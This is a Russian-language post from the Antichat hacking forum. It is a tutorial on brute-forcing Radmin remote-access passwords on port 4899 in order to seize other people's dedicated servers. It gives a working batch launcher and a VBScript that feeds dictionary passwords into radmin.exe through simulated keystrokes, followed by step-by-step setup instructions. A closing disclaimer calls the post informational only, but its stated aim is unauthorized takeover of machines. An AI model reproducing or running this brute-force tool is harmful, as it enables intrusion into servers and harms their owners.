Форум АНТИЧАТ - брутфорс дедиков через Radmin

[{Введение}

Салют всем любителям «холявных» дедиков, и просто нашедшим на атакуймой машине открытый 4899 порт из под радмина посвящается.

{Теория}

Все мы сталкивались с такой ситуацией ,когда насканив радминовский порт ,мы с безумным блеском в глазах вбивая дефолтный пасс , обламывались на говно. А взять себе данный дед, желание так просто и распирает. Что делать??? Все просто пишем свой Брут под данный косяк.
Для начала у нас должен быть алгоритм. Для написания Я выбрал язык программирования VBS script. Что же должен делать наш брутфорс.
Вот простенький алгоритм (Проще думаю уже некуда) :

1.Это принимать IP-адрес атакуемой машины.
2. Находить словарь, и по нему осуществлять подбор
3. Выводить результат.

Ну всё переходим к практике.

{Практика (геморрой)}( Все что приведено тут делается в простом блокноте.)

Что так просто кажется в теории, не так просто сделать на практике. Для начала сделаем сам брут. Так как програмулину на ВБС учить работать с сетью это мутатень, будем использовать программу уже умеющую делать это, а именно Radmin.exe.
Первое что мы сделаем , это создадим бат файл , где укажем какие параметры он должен передать брут скрипту. Исходник батника будет выглядеть так :

Start.bat

Код:

cscript winner13.vbs password.txt

(сохраняем это в файл start.bat)
Тут видим что через батник запускается winner13.vbs с параметром password.txt

Где же сам брутфорс спросите вы ,а вот он:
(из за простоты скрипта, комментарий думаю излишний)

Код:

WScript.Echo " "

WScript.Echo " "

WScript.Echo " "

WScript.Echo " "

WScript.Echo "      ==================================================="

WScript.Echo "      =    Вводим ip атакуемого                        ="

WScript.Echo "      =                                                             ="

WScript.Echo "      =    Используется: cscript winner13.vbs          ="

WScript.Echo "      =    Подбор по словарю = password.txt     ="

WScript.Echo "      ==================================================="

WScript.Echo " "

WScript.Echo "          note: do not interfere with the process !!!!  "

WScript.Echo " "

WScript.Echo " "



Set objShell = CreateObject("Wscript.Shell") ' создаём вбс объект



intValue = InputBox("Please Enter Your Target IP:") ' делаем ввод данных по айпишнегу.

strCommandLine = intValue







Set cmd = CreateObject("WScript.Shell")

If WScript.Arguments(0) = "" Then

   WScript.Echo "usage: cscript vbsFile.vbs <yourtxtfile>" ' юзаем наш password.TXT

Else

   Set fso = CreateObject("Scripting.FileSystemObject")

   Filename = WScript.Arguments(0)



   If fso.FileExists(Filename) Then ' цикл подбора

       Set objTextFile = fso.OpenTextFile(Filename,1) ' открытие словаря

WScript.Sleep 2000

      Do Until objTextFile.AtEndOfStream

line = objTextFile.Readline



WScript.Echo "[+]       Атакуется " & intValue & "....... " & line ' вывод строки

WScript.Sleep 200

      set WshShell = WScript.CreateObject("WScript.Shell") ' начало работы с файлом radmin.exe

WshShell.Run "radmin.exe /connect:" & intValue & ":4899 /telnet" 'запуск

WScript.Sleep 1000 'задержка в секунду

WshShell.AppActivate "Enter password for <Entry name>" 'вывод положительного результат если таковой есть

WshShell.SendKeys line

WScript.Sleep 1000 'задержка в секунду

WshShell.SendKeys "{ENTER}"

WScript.Sleep 1000

WshShell.SendKeys "{ENTER}"



loop

       objTextFile.Close 'закрытие словаря

   Else

       WScript.Echo Filename & "не найденно" ' вывод отрицательного результата

   End If

End If

(всё это сохраняем как winner13.vbs)
Ну вот 2 файла у нас готово , это start.bat и winner13.vbs. Теперь нам лишь остается закинуть в папку саму программу radmin.exe, и словарь для атаки password.txt

Итак. Последовательность действий:
1.Выделяем какую нить пустую папочку
2. Создаем там батник start.bat
3.Создаем ВБСскрипт winner13.vbs
4. Кидаем туда же radmin.exe
5. Создаем словарь для атаки password.txt
А дальше всё просто =).Брутим дедик , и наслаждаемся результатом.

{Вывод}

Ну тут как обычно , автор не несёт ответственности за ваши действия , и т.д и т.п. Всё что вы сделаете в этом виноваты вы сами, эта статья лишь для ознакомления. Всем всего доброго. Поверид бай winner13
(с) winner13

P.S. для тех у кого нечего не работает, чуть позже выложу уже готовое. С наилучшими пожеланиями от меня.